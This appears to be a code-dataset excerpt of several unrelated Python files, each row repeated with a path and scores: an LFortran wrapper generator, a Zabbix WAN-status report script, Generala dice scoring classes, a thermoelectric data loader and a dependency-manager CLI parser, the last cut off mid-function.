self.assertTrue(decompressed_buffer is not None)
self.assertEqual(len(decompressed_buffer), len(default_buffer))
self.assertEqual(decompressed_buffer, default_buffer)
if __name__ == '__main__':
unittest.main() | 0.451085 | 0.455804 |
import sys
sys.path.append("../..")
from lfortran.asr import asr
from lfortran.asr.asr_check import verify_asr
from lfortran.asr.asr_to_ast import asr_to_ast
from lfortran.ast.ast_to_src import ast_to_src
from lfortran.adapters.gfortran.mod import mod_to_asr
from lfortran.asr.builder import (make_translation_unit,
translation_unit_make_module, scope_add_function, make_type_integer,
make_type_real, type_eq, make_binop, scope_add_symbol, Scope,
function_make_var, array_is_assumed_shape)
class NodeTransformer(asr.NodeTransformerBase):
def visit_scope(self, symtab, parent=None):
new_symtab = Scope(parent)
self._lookup = 2
self._scope = new_symtab
for s, sym in symtab.symbols.items():
new_symtab.symbols[s] = self.visit(sym)
self._lookup = 0
return new_symtab
def visit_sequence(self, seq):
r = []
if seq is not None:
for node in seq:
r.append(self.visit(node))
return r
def visit_object(self, o):
if isinstance(o, Scope):
return self.visit_scope(o)
elif isinstance(o, list):
return self.visit_sequence(o)
elif isinstance(o, (str, int)) or o is None:
return o
else:
print(type(o))
raise NotImplementedError()
def visit_Function(self, node):
name = self.visit_object(node.name)
symtab = self.visit_object(node.symtab)
self._lookup = 1
self._scope = symtab
args = self.visit_sequence(node.args)
body = self.visit_sequence(node.body)
return_var = self.visit(node.return_var)
self._lookup = 0
if node.bind:
bind = self.visit(node.bind)
else:
bind = None
return asr.Function(name=name, args=args, body=body, bind=bind, return_var=return_var, symtab=symtab)
def visit_VariableOld(self, node):
if self._lookup == 1:
return self._scope.resolve(node.name)
elif self._lookup == 2:
v = self._scope.resolve(node.name, raise_exception=False)
if v:
return v
name = self.visit_object(node.name)
intent = self.visit_object(node.intent)
dummy = self.visit_object(node.dummy)
type = self.visit(node.type)
return asr.VariableOld(name=name, intent=intent, dummy=dummy, type=type)
class WrapperVisitor(NodeTransformer):
def visit_Module(self, node):
name = "mod2" #node.name + "_wrapper"
self._modname = node.name
symtab = self.visit_scope(node.symtab)
return asr.Module(name=name, symtab=symtab)
def visit_Function(self, node):
name = self.visit_object(node.name)
symtab = self.visit_object(node.symtab)
self._lookup = 1
self._scope = symtab
args = self.visit_sequence(node.args)
body = self.visit_sequence(node.body)
self._lookup = 0
if node.bind:
bind = self.visit(node.bind)
else:
bind = None
tmp = asr.VariableOld(name="a", type=make_type_integer())
f = asr.Function(name=name, args=args, body=body, bind=bind,
symtab=symtab, return_var=tmp)
return_var = function_make_var(f, name="r", type=self.visit(node.return_var.type))
return_var.dummy = True
f.return_var = return_var
cname = node.name + "_c_wrapper"
mangled_name = '__' + self._modname + '_MOD_' + node.name.lower()
bind = asr.Bind(lang="c", name=mangled_name)
cargs = []
args2 = []
type1 = make_type_integer()
type1.dims = [asr.dimension(asr.Num(n=1, type=make_type_integer()))]
type2 = make_type_integer()
type2.dims = [
asr.dimension(asr.Num(n=1, type=make_type_integer())),
asr.dimension(asr.Num(n=1, type=make_type_integer()))
]
c_desc1 = scope_add_function(
symtab,
"c_desc1_int32",
args=[
asr.VariableOld(
name="A",
intent="in",
type=type1
)
],
return_var=asr.VariableOld(
name="c_desc1_int32",
type=asr.Derived(name="c_desc1_t")
),
module = "gfort_interop"
)
c_desc2 = scope_add_function(
symtab,
"c_desc2_int32",
args=[
asr.VariableOld(
name="A",
intent="in",
type=type2
)
],
return_var=asr.VariableOld(
name="c_desc2_int32",
type=asr.Derived(name="c_desc2_t")
),
module = "gfort_interop"
)
for arg in node.args:
type = self.visit(arg.type)
if array_is_assumed_shape(type):
if len(type.dims) == 1:
dname = "c_desc1_t"
fname = c_desc1
elif len(type.dims) == 2:
dname = "c_desc2_t"
fname = c_desc2
else:
raise NotImplementedError("Too many dimensions")
type = asr.Derived(name=dname, module="gfort_interop")
args2.append(asr.FuncCall(func=fname, args=[arg],
keywords=[], type=type))
else:
args2.append(arg)
cargs.append(asr.VariableOld(
name=arg.name,
intent=arg.intent,
type=type,
))
fw = scope_add_function(symtab, cname, args=cargs, return_var=cname)
fw.bind = bind
body = [
asr.Assignment(return_var,
asr.FuncCall(func=fw, args=args2, keywords=[],
type=fw.return_var.type)
)
]
f.body = body
return f
def create_wrapper(u):
v = WrapperVisitor()
u2 = v.visit(u)
verify_asr(u2)
return u2
u = mod_to_asr("mod1.mod")
a = asr_to_ast(u)
s = ast_to_src(a)
#print(s)
u2 = create_wrapper(u)
a = asr_to_ast(u2)
s = ast_to_src(a)
#print("-"*80)
print(s) | integration_tests/interop/wrap2.py | import sys
sys.path.append("../..")
from lfortran.asr import asr
from lfortran.asr.asr_check import verify_asr
from lfortran.asr.asr_to_ast import asr_to_ast
from lfortran.ast.ast_to_src import ast_to_src
from lfortran.adapters.gfortran.mod import mod_to_asr
from lfortran.asr.builder import (make_translation_unit,
translation_unit_make_module, scope_add_function, make_type_integer,
make_type_real, type_eq, make_binop, scope_add_symbol, Scope,
function_make_var, array_is_assumed_shape)
class NodeTransformer(asr.NodeTransformerBase):
def visit_scope(self, symtab, parent=None):
new_symtab = Scope(parent)
self._lookup = 2
self._scope = new_symtab
for s, sym in symtab.symbols.items():
new_symtab.symbols[s] = self.visit(sym)
self._lookup = 0
return new_symtab
def visit_sequence(self, seq):
r = []
if seq is not None:
for node in seq:
r.append(self.visit(node))
return r
def visit_object(self, o):
if isinstance(o, Scope):
return self.visit_scope(o)
elif isinstance(o, list):
return self.visit_sequence(o)
elif isinstance(o, (str, int)) or o is None:
return o
else:
print(type(o))
raise NotImplementedError()
def visit_Function(self, node):
name = self.visit_object(node.name)
symtab = self.visit_object(node.symtab)
self._lookup = 1
self._scope = symtab
args = self.visit_sequence(node.args)
body = self.visit_sequence(node.body)
return_var = self.visit(node.return_var)
self._lookup = 0
if node.bind:
bind = self.visit(node.bind)
else:
bind = None
return asr.Function(name=name, args=args, body=body, bind=bind, return_var=return_var, symtab=symtab)
def visit_VariableOld(self, node):
if self._lookup == 1:
return self._scope.resolve(node.name)
elif self._lookup == 2:
v = self._scope.resolve(node.name, raise_exception=False)
if v:
return v
name = self.visit_object(node.name)
intent = self.visit_object(node.intent)
dummy = self.visit_object(node.dummy)
type = self.visit(node.type)
return asr.VariableOld(name=name, intent=intent, dummy=dummy, type=type)
class WrapperVisitor(NodeTransformer):
def visit_Module(self, node):
name = "mod2" #node.name + "_wrapper"
self._modname = node.name
symtab = self.visit_scope(node.symtab)
return asr.Module(name=name, symtab=symtab)
def visit_Function(self, node):
name = self.visit_object(node.name)
symtab = self.visit_object(node.symtab)
self._lookup = 1
self._scope = symtab
args = self.visit_sequence(node.args)
body = self.visit_sequence(node.body)
self._lookup = 0
if node.bind:
bind = self.visit(node.bind)
else:
bind = None
tmp = asr.VariableOld(name="a", type=make_type_integer())
f = asr.Function(name=name, args=args, body=body, bind=bind,
symtab=symtab, return_var=tmp)
return_var = function_make_var(f, name="r", type=self.visit(node.return_var.type))
return_var.dummy = True
f.return_var = return_var
cname = node.name + "_c_wrapper"
mangled_name = '__' + self._modname + '_MOD_' + node.name.lower()
bind = asr.Bind(lang="c", name=mangled_name)
cargs = []
args2 = []
type1 = make_type_integer()
type1.dims = [asr.dimension(asr.Num(n=1, type=make_type_integer()))]
type2 = make_type_integer()
type2.dims = [
asr.dimension(asr.Num(n=1, type=make_type_integer())),
asr.dimension(asr.Num(n=1, type=make_type_integer()))
]
c_desc1 = scope_add_function(
symtab,
"c_desc1_int32",
args=[
asr.VariableOld(
name="A",
intent="in",
type=type1
)
],
return_var=asr.VariableOld(
name="c_desc1_int32",
type=asr.Derived(name="c_desc1_t")
),
module = "gfort_interop"
)
c_desc2 = scope_add_function(
symtab,
"c_desc2_int32",
args=[
asr.VariableOld(
name="A",
intent="in",
type=type2
)
],
return_var=asr.VariableOld(
name="c_desc2_int32",
type=asr.Derived(name="c_desc2_t")
),
module = "gfort_interop"
)
for arg in node.args:
type = self.visit(arg.type)
if array_is_assumed_shape(type):
if len(type.dims) == 1:
dname = "c_desc1_t"
fname = c_desc1
elif len(type.dims) == 2:
dname = "c_desc2_t"
fname = c_desc2
else:
raise NotImplementedError("Too many dimensions")
type = asr.Derived(name=dname, module="gfort_interop")
args2.append(asr.FuncCall(func=fname, args=[arg],
keywords=[], type=type))
else:
args2.append(arg)
cargs.append(asr.VariableOld(
name=arg.name,
intent=arg.intent,
type=type,
))
fw = scope_add_function(symtab, cname, args=cargs, return_var=cname)
fw.bind = bind
body = [
asr.Assignment(return_var,
asr.FuncCall(func=fw, args=args2, keywords=[],
type=fw.return_var.type)
)
]
f.body = body
return f
def create_wrapper(u):
v = WrapperVisitor()
u2 = v.visit(u)
verify_asr(u2)
return u2
u = mod_to_asr("mod1.mod")
a = asr_to_ast(u)
s = ast_to_src(a)
#print(s)
u2 = create_wrapper(u)
a = asr_to_ast(u2)
s = ast_to_src(a)
#print("-"*80)
print(s) | 0.251188 | 0.201165 |
import time
import csv
import codecs
import HTML
from zabbix.api import ZabbixAPI
from datetime import timedelta
from datetime import datetime
from itertools import repeat
def zabbix_dane_tabelka(IP):
hID = []
dane_z_zabbix = {'hostname':{}, 'lan':{}, 'loop':{}, 'last_clock_loop':{}}
_ = {}
zapi = ZabbixAPI(url='https://pit-zabbix.net.pp', user='***', password='***')
result = zapi.do_request('hostinterface.get', {'filter': {'ip':IP}, 'limit':'100'})
result = result['result']
hID.extend(repeat('', len(IP)))
for i in enumerate(result):
hID[IP.index(i[1]['ip'])] = i[1]['hostid']
result = zapi.do_request('host.get', {'filter': {'hostid':hID}, 'limit':'100'})
result = result['result']
for e in enumerate(hID):
for x in enumerate(hID):
if result[x[0]].get('hostid', '') == e[1]:
dane_z_zabbix['hostname'][hID[e[0]]] = 'Netia' if result[x[0]]['name'].find('Netia') != -1 else 'T-Mobile'
break
result = zapi.do_request('item.get', {'filter': {'hostid':hID, 'value_type':'3', 'name':['Ping Loopback (ICMP Echo) -{HOST.DNS}', 'Ping LAN (ICMP Echo)','Ping Loopback (ICMP Echo)']}, 'limit':'100'})
result = result['result']
for e in enumerate(result):
for x in enumerate(hID):
if result[e[0]]['hostid'] == x[1] and result[e[0]]['name'] == 'Ping LAN (ICMP Echo)':
dane_z_zabbix['lan'][x[1]] = result[e[0]].get('lastvalue', '')
break
if result[e[0]]['hostid'] == x[1] and ((result[e[0]]['name'] == 'Ping Loopback (ICMP Echo) -{HOST.DNS}') or (result[e[0]]['name'] == 'Ping Loopback (ICMP Echo)')):
dane_z_zabbix['loop'][x[1]] = result[e[0]].get('lastvalue', -1)
result3 = zapi.do_request('trigger.get', {'filter': {'hostid':x[1], 'description':'OUT,T-DUIiS:Ping-Brak komunikacji z adresem LAN oraz Loopback (5m) -Niezalezny od EJP'}, 'limit':'1'})
dane_z_zabbix['last_clock_loop'][x[1]] = result3['result'][0].get('lastchange', '')
break
del result, result3
return hID, dane_z_zabbix
def raportWAN():
reader = csv.reader(codecs.open('query.csv', 'rU', 'utf-16-le'))
header_temp, temp_table = [], []
for row in iter(reader):
temp_table.append(row[0:2] + row[5:11] + ['']*3)
del reader
header_temp=temp_table[0][0:8] + ['Operator wg Zabbix', 'Status Zabbix<br>(Lan+Loopback)', 'GSM<br>(Lan vs Loopback)']
header_temp[1] = 'Data rejestracji<br>Incydentu WAN'
header_temp[5] = 'Data przekazania<br>zgłoszenia do Netii'
header_temp[6] = 'Numer zgłoszenia<br>awarii w Netii'
del temp_table[0]
temp_czas = ''
temp_IP = [temp_table[i[0]][2] for i in enumerate(temp_table)]
value = zabbix_dane_tabelka(temp_IP)
for i, t in enumerate(temp_table):
t[0] = HTML.link(t[0], 'https://servicedesk.net.pp/SD_Operator.WebAccess/wd/search/search.rails?s=' + t[0])
t[2] = HTML.link(t[2], 'https://pit-zabbix.net.pp/latest.php?filter_set=1&hostids[]=' + value[0][i]) + ' ' + HTML.link('(TR)', 'https://pit-zabbix.net.pp/search.php?search=' + t[2])
try:
t[8] = value[1]['hostname'][value[0][i]]
except:
pass
try:
temp_czas = datetime.fromtimestamp(int(value[1]['last_clock_loop'][value[0][i]])).strftime('%Y-%m-%d %H:%M:%S')
except:
temp_czas = ''
pass
delta = datetime.now() - datetime.fromtimestamp(int(value[1]['last_clock_loop'][value[0][i]]))
if value[1]['lan'].get(value[0][i], '') == '1':
t[9] = '<font color="green"><b>OK</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, delta.days)
else:
t[9] = '<font color="red"><b>DOWN</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, delta.days)
if value[1]['loop'].get(value[0][i], '') == '0' and value[1]['lan'].get(value[0][i], '') == '1':
t[10] = 'Prawdopodobny modem GSM<br>(Loop=Down, LAN=OK)'
with open('query.html', 'w+', encoding='utf-8') as html_file:
html_file.write('<script src="sorttable.js"></script>')
html_file.write('<link type="text/css" rel="stylesheet" href="zab.css">')
html_file.write('<h1>Plik query.csv załadowano.</h1><h2><br>Import zakończony</h2>')
html_file.write(HTML.table(temp_table, header_row=header_temp, attribs={'class':'sortable'}))
raportWAN() | trzeci.py | import time
import csv
import codecs
import HTML
from zabbix.api import ZabbixAPI
from datetime import timedelta
from datetime import datetime
from itertools import repeat
def zabbix_dane_tabelka(IP):
hID = []
dane_z_zabbix = {'hostname':{}, 'lan':{}, 'loop':{}, 'last_clock_loop':{}}
_ = {}
zapi = ZabbixAPI(url='https://pit-zabbix.net.pp', user='***', password='***')
result = zapi.do_request('hostinterface.get', {'filter': {'ip':IP}, 'limit':'100'})
result = result['result']
hID.extend(repeat('', len(IP)))
for i in enumerate(result):
hID[IP.index(i[1]['ip'])] = i[1]['hostid']
result = zapi.do_request('host.get', {'filter': {'hostid':hID}, 'limit':'100'})
result = result['result']
for e in enumerate(hID):
for x in enumerate(hID):
if result[x[0]].get('hostid', '') == e[1]:
dane_z_zabbix['hostname'][hID[e[0]]] = 'Netia' if result[x[0]]['name'].find('Netia') != -1 else 'T-Mobile'
break
result = zapi.do_request('item.get', {'filter': {'hostid':hID, 'value_type':'3', 'name':['Ping Loopback (ICMP Echo) -{HOST.DNS}', 'Ping LAN (ICMP Echo)','Ping Loopback (ICMP Echo)']}, 'limit':'100'})
result = result['result']
for e in enumerate(result):
for x in enumerate(hID):
if result[e[0]]['hostid'] == x[1] and result[e[0]]['name'] == 'Ping LAN (ICMP Echo)':
dane_z_zabbix['lan'][x[1]] = result[e[0]].get('lastvalue', '')
break
if result[e[0]]['hostid'] == x[1] and ((result[e[0]]['name'] == 'Ping Loopback (ICMP Echo) -{HOST.DNS}') or (result[e[0]]['name'] == 'Ping Loopback (ICMP Echo)')):
dane_z_zabbix['loop'][x[1]] = result[e[0]].get('lastvalue', -1)
result3 = zapi.do_request('trigger.get', {'filter': {'hostid':x[1], 'description':'OUT,T-DUIiS:Ping-Brak komunikacji z adresem LAN oraz Loopback (5m) -Niezalezny od EJP'}, 'limit':'1'})
dane_z_zabbix['last_clock_loop'][x[1]] = result3['result'][0].get('lastchange', '')
break
del result, result3
return hID, dane_z_zabbix
def raportWAN():
reader = csv.reader(codecs.open('query.csv', 'rU', 'utf-16-le'))
header_temp, temp_table = [], []
for row in iter(reader):
temp_table.append(row[0:2] + row[5:11] + ['']*3)
del reader
header_temp=temp_table[0][0:8] + ['Operator wg Zabbix', 'Status Zabbix<br>(Lan+Loopback)', 'GSM<br>(Lan vs Loopback)']
header_temp[1] = 'Data rejestracji<br>Incydentu WAN'
header_temp[5] = 'Data przekazania<br>zgłoszenia do Netii'
header_temp[6] = 'Numer zgłoszenia<br>awarii w Netii'
del temp_table[0]
temp_czas = ''
temp_IP = [temp_table[i[0]][2] for i in enumerate(temp_table)]
value = zabbix_dane_tabelka(temp_IP)
for i, t in enumerate(temp_table):
t[0] = HTML.link(t[0], 'https://servicedesk.net.pp/SD_Operator.WebAccess/wd/search/search.rails?s=' + t[0])
t[2] = HTML.link(t[2], 'https://pit-zabbix.net.pp/latest.php?filter_set=1&hostids[]=' + value[0][i]) + ' ' + HTML.link('(TR)', 'https://pit-zabbix.net.pp/search.php?search=' + t[2])
try:
t[8] = value[1]['hostname'][value[0][i]]
except:
pass
try:
temp_czas = datetime.fromtimestamp(int(value[1]['last_clock_loop'][value[0][i]])).strftime('%Y-%m-%d %H:%M:%S')
except:
temp_czas = ''
pass
delta = datetime.now() - datetime.fromtimestamp(int(value[1]['last_clock_loop'][value[0][i]]))
if value[1]['lan'].get(value[0][i], '') == '1':
t[9] = '<font color="green"><b>OK</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, delta.days)
else:
t[9] = '<font color="red"><b>DOWN</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, delta.days)
if value[1]['loop'].get(value[0][i], '') == '0' and value[1]['lan'].get(value[0][i], '') == '1':
t[10] = 'Prawdopodobny modem GSM<br>(Loop=Down, LAN=OK)'
with open('query.html', 'w+', encoding='utf-8') as html_file:
html_file.write('<script src="sorttable.js"></script>')
html_file.write('<link type="text/css" rel="stylesheet" href="zab.css">')
html_file.write('<h1>Plik query.csv załadowano.</h1><h2><br>Import zakończony</h2>')
html_file.write(HTML.table(temp_table, header_row=header_temp, attribs={'class':'sortable'}))
raportWAN() | 0.136522 | 0.19112 |
import abc
import math
from generala import Category
class Number(Category):
def __init__(self, n):
self._n = n
def score(self, counts, roll, open_categories):
return self._n * counts[self._n-1]
def __str__(self):
return "{}s".format(self._n)
class MajorHand(Category):
def __init__(self, score, first_roll_bonus):
self._score = score
self._first_roll_bonus = first_roll_bonus
class Straight(MajorHand):
def score(self, counts, roll, open_categories):
if counts == (0,1,1,1,1,1) or counts == (1,1,1,1,1,0):
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Straight"
class FullHouse(MajorHand):
def score(self, counts, roll, open_categories):
if 3 in counts and 2 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Full house"
class FourOfAKind(MajorHand):
def score(self, counts, roll, open_categories):
if 4 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Four of a kind"
class Generala(MajorHand):
def score(self, counts, roll, open_categories):
if 5 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Generala"
class DoubleGenerala(MajorHand):
def __init__(self, score, first_roll_bonus, generala):
super().__init__(score, first_roll_bonus)
self._generala = generala
def score(self, counts, roll, open_categories):
if self._generala not in open_categories and 5 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Double Generala"
numbers = tuple(Number(n) for n in range(1,7))
ones, twos, threes, fours, fives, sixes = numbers
straight = Straight(score=30, first_roll_bonus=10)
full_house = FullHouse(score=50, first_roll_bonus=10)
four_of_a_kind = FourOfAKind(score=80, first_roll_bonus=10)
generala = Generala(score=100, first_roll_bonus=math.inf)
double_generala = DoubleGenerala(score=200, first_roll_bonus=math.inf, generala=generala)
all_categories = (*numbers, straight, full_house, four_of_a_kind, generala, double_generala)
class MaxScore(Category):
def __init__(self, categories):
self._categories = categories
def score(self, counts, roll, open_categories):
return max(cat.score(counts, roll, open_categories) for cat in self._categories)
def __str__(self):
return "any" | generala/categories.py | import abc
import math
from generala import Category
class Number(Category):
def __init__(self, n):
self._n = n
def score(self, counts, roll, open_categories):
return self._n * counts[self._n-1]
def __str__(self):
return "{}s".format(self._n)
class MajorHand(Category):
def __init__(self, score, first_roll_bonus):
self._score = score
self._first_roll_bonus = first_roll_bonus
class Straight(MajorHand):
def score(self, counts, roll, open_categories):
if counts == (0,1,1,1,1,1) or counts == (1,1,1,1,1,0):
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Straight"
class FullHouse(MajorHand):
def score(self, counts, roll, open_categories):
if 3 in counts and 2 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Full house"
class FourOfAKind(MajorHand):
def score(self, counts, roll, open_categories):
if 4 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Four of a kind"
class Generala(MajorHand):
def score(self, counts, roll, open_categories):
if 5 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Generala"
class DoubleGenerala(MajorHand):
def __init__(self, score, first_roll_bonus, generala):
super().__init__(score, first_roll_bonus)
self._generala = generala
def score(self, counts, roll, open_categories):
if self._generala not in open_categories and 5 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Double Generala"
numbers = tuple(Number(n) for n in range(1,7))
ones, twos, threes, fours, fives, sixes = numbers
straight = Straight(score=30, first_roll_bonus=10)
full_house = FullHouse(score=50, first_roll_bonus=10)
four_of_a_kind = FourOfAKind(score=80, first_roll_bonus=10)
generala = Generala(score=100, first_roll_bonus=math.inf)
double_generala = DoubleGenerala(score=200, first_roll_bonus=math.inf, generala=generala)
all_categories = (*numbers, straight, full_house, four_of_a_kind, generala, double_generala)
class MaxScore(Category):
def __init__(self, categories):
self._categories = categories
def score(self, counts, roll, open_categories):
return max(cat.score(counts, roll, open_categories) for cat in self._categories)
def __str__(self):
return "any" | 0.718496 | 0.243991 |
from pandas import DataFrame, read_csv
from thermo.utils import ROOT
def to_type(df: DataFrame, dtype: str = "float32") -> DataFrame:
"""Convert all non-string columns to a different data type.
E.g. float64 and int to float32.
"""
df_not_str = df.select_dtypes(exclude=[object]).astype(dtype)
df_str = df.select_dtypes(include=[object])
return df_not_str.join(df_str)
def load_gaultois(
target_cols: list = ["rho", "seebeck", "kappa", "zT"], drop_outliers=False
) -> tuple[DataFrame, DataFrame]:
"""Load Magpie features and targets of the hand-curated
Gaultois thermoelectrics database.
Label units (in /data/gaultois_targets.csv):
- electrical resistivity (rho): Ohm * meter
- Seebeck coefficient (S): Volts / Kelvin
- thermal conductivity (kappa): Watts / (meter * Kelvin)
- thermoelectric figure of merit (zT): dimensionless
Args:
target_cols (list, optional): Which targets to load.
Defaults to ["rho", "seebeck", "kappa", "zT"].
Returns:
tuple: 2 dataframes for features and targets
"""
features = read_csv(ROOT + "/data/gaultois_magpie_features.csv").drop(
columns=["formula"]
)
targets = read_csv(
ROOT + "/data/gaultois_targets.csv",
header=1,
na_values="", # only consider empty string as missing value
keep_default_na=False, # no longer consider NaN as missing
)
if drop_outliers:
features = features[targets.outliers.isna()]
targets = targets[targets.outliers.isna()]
if target_cols:
targets = targets[target_cols]
return to_type(features), to_type(targets)
def load_screen() -> tuple[DataFrame, DataFrame]:
"""Load material candidates into a dataframe for screening. Available columns
are formula, database ID and MagPie features for over 80,000 compositions pulled
from COD and ICSD.
"""
features = read_csv(ROOT + "/data/screen_set_magpie_features.csv")
# na_filter=False prevents sodium amide (NaN) from being parsed as 'not a number'
formulas = read_csv(
ROOT + "/data/screen_formulas.csv",
comment="#",
na_values="", # only consider empty string as missing value
keep_default_na=False, # no longer consider NaN as missing
)
return formulas, features | thermo/data/load.py | from pandas import DataFrame, read_csv
from thermo.utils import ROOT
def to_type(df: DataFrame, dtype: str = "float32") -> DataFrame:
"""Convert all non-string columns to a different data type.
E.g. float64 and int to float32.
"""
df_not_str = df.select_dtypes(exclude=[object]).astype(dtype)
df_str = df.select_dtypes(include=[object])
return df_not_str.join(df_str)
def load_gaultois(
target_cols: list = ["rho", "seebeck", "kappa", "zT"], drop_outliers=False
) -> tuple[DataFrame, DataFrame]:
"""Load Magpie features and targets of the hand-curated
Gaultois thermoelectrics database.
Label units (in /data/gaultois_targets.csv):
- electrical resistivity (rho): Ohm * meter
- Seebeck coefficient (S): Volts / Kelvin
- thermal conductivity (kappa): Watts / (meter * Kelvin)
- thermoelectric figure of merit (zT): dimensionless
Args:
target_cols (list, optional): Which targets to load.
Defaults to ["rho", "seebeck", "kappa", "zT"].
Returns:
tuple: 2 dataframes for features and targets
"""
features = read_csv(ROOT + "/data/gaultois_magpie_features.csv").drop(
columns=["formula"]
)
targets = read_csv(
ROOT + "/data/gaultois_targets.csv",
header=1,
na_values="", # only consider empty string as missing value
keep_default_na=False, # no longer consider NaN as missing
)
if drop_outliers:
features = features[targets.outliers.isna()]
targets = targets[targets.outliers.isna()]
if target_cols:
targets = targets[target_cols]
return to_type(features), to_type(targets)
def load_screen() -> tuple[DataFrame, DataFrame]:
"""Load material candidates into a dataframe for screening. Available columns
are formula, database ID and MagPie features for over 80,000 compositions pulled
from COD and ICSD.
"""
features = read_csv(ROOT + "/data/screen_set_magpie_features.csv")
# na_filter=False prevents sodium amide (NaN) from being parsed as 'not a number'
formulas = read_csv(
ROOT + "/data/screen_formulas.csv",
comment="#",
na_values="", # only consider empty string as missing value
keep_default_na=False, # no longer consider NaN as missing
)
return formulas, features | 0.90904 | 0.613989 |
import sys
import argparse
import logging
from . import CLI, VERSION, DESCRIPTION
from . import common, exceptions, commands
log = logging.getLogger(__name__)
def main(args=None, function=None): # pylint: disable=too-many-statements
"""Process command-line arguments and run the program."""
# Shared options
debug = argparse.ArgumentParser(add_help=False)
debug.add_argument('-V', '--version', action='version', version=VERSION)
group = debug.add_mutually_exclusive_group()
group.add_argument('-v', '--verbose', action='count', default=0,
help="enable verbose logging")
group.add_argument('-q', '--quiet', action='store_const', const=-1,
dest='verbose', help="only display errors and prompts")
project = argparse.ArgumentParser(add_help=False)
project.add_argument('-r', '--root', metavar='PATH',
help="root directory of the project")
depth = argparse.ArgumentParser(add_help=False)
depth.add_argument('-d', '--depth', type=common.positive_int,
default=5, metavar="NUM",
help="limit the number of dependency levels")
options = argparse.ArgumentParser(add_help=False)
options.add_argument('-f', '--force', action='store_true',
help="overwrite uncommitted changes in dependencies")
options.add_argument('-c', '--clean', action='store_true',
help="delete ignored files in dependencies")
shared = {'formatter_class': common.WideHelpFormatter}
# Main parser
parser = argparse.ArgumentParser(prog=CLI, description=DESCRIPTION,
parents=[debug], **shared)
subs = parser.add_subparsers(help="", dest='command', metavar="<command>")
# Init parser
info = "create a new config file for the project"
sub = subs.add_parser('init', description=info.capitalize() + '.',
help=info, parents=[debug], **shared)
# Install parser
info = "get the specified versions of all dependencies"
sub = subs.add_parser('install', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth, options],
**shared)
sub.add_argument('name', nargs='*',
help="list of dependencies names to install")
sub.add_argument('-e', '--fetch', action='store_true',
help="always fetch the latest branches")
# Update parser
info = "update dependencies to the latest versions"
sub = subs.add_parser('update', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth, options],
**shared)
sub.add_argument('name', nargs='*',
help="list of dependencies names to update")
sub.add_argument('-a', '--all', action='store_true', dest='recurse',
help="also update all nested dependencies")
sub.add_argument('-L', '--skip-lock',
action='store_false', dest='lock', default=None,
help="disable recording of updated versions")
# List parser
info = "display the current version of each dependency"
sub = subs.add_parser('list', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth], **shared)
sub.add_argument('-D', '--fail-if-dirty', action='store_false',
dest='allow_dirty',
help="fail if a source has uncommitted changes")
# Lock parser
info = "lock the current version of each dependency"
sub = subs.add_parser('lock', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('name', nargs='*',
help="list of dependency names to lock")
# Uninstall parser
info = "delete all installed dependencies"
sub = subs.add_parser('uninstall', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('-f', '--force', action='store_true',
help="delete uncommitted changes in dependencies")
sub.add_argument('-k', '--keep-location', dest='keep_location', default=False,
action='store_true', help="keep top level folder location")
# Show parser
info = "display the path of a dependency or internal file"
sub = subs.add_parser('show', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('name', nargs='*',
help="display the path of this dependency")
sub.add_argument('-c', '--config', action='store_true',
help="display the path of the config file")
sub.add_argument('-l', '--log', action='store_true',
help="display the path of the log file")
# Edit parser
info = "open the config file in the default editor"
sub = subs.add_parser('edit', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
# Parse arguments
namespace = parser.parse_args(args=args)
# Configure logging
common.configure_logging(namespace.verbose)
# Run the program
function, args, kwargs = _get_command(function, namespace)
if function:
_run_command(function, args, kwargs)
else:
parser.print_help()
sys.exit(1)
def _get_command(function, namespace): # pylint: disable=too-many-statements
args = []
kwargs = {}
if namespace.command == 'init':
function = commands.init
elif namespace.command in ['install', 'update']:
function = getattr(commands, namespace.command)
args = namespace.name
kwargs.update(root=namespace.root,
depth=namespace.depth,
force=namespace.force,
clean=namespace.clean)
if namespace.command == 'install':
kwargs.update(fetch=namespace.fetch)
if namespace.command == 'update':
kwargs.update(recurse=namespace.recurse,
lock=namespace.lock)
elif namespace.command == 'list':
function = commands.display
kwargs.update(root=namespace.root,
depth=namespace.depth,
allow_dirty=namespace.allow_dirty)
elif namespace.command == 'lock':
function = getattr(commands, namespace.command)
args = namespace.name
kwargs.update(root=namespace.root)
elif namespace.command == 'uninstall':
function = commands.delete
kwargs.update(root=namespace.root,
force=namespace.force,
keep_location=namespace.keep_location)
elif namespace.command == 'show':
function = commands.show
args = namespace.name
kwargs.update(root=namespace.root)
if namespace.config:
args.append('__config__')
if namespace.log:
args.append('__log__')
elif namespace.command == 'edit':
function = commands.edit
kwargs.update(root=namespace.root)
return function, args, kwargs
def _run_command(function, args, kwargs):
success = False
exit_message = None
try:
log.debug("Running %s command...", getattr(function, '__name__', 'a'))
success = function(*args, **kwargs)
except KeyboardInterrupt:
log.debug("Command canceled")
except exceptions.UncommittedChanges as exception:
_show_error(exception)
exit_message = "Run again with '--force' to discard changes"
except exceptions.ScriptFailure as exception:
_show_error(exception)
exit_message = "Run again with '--force' to ignore script errors"
finally:
if exit_message:
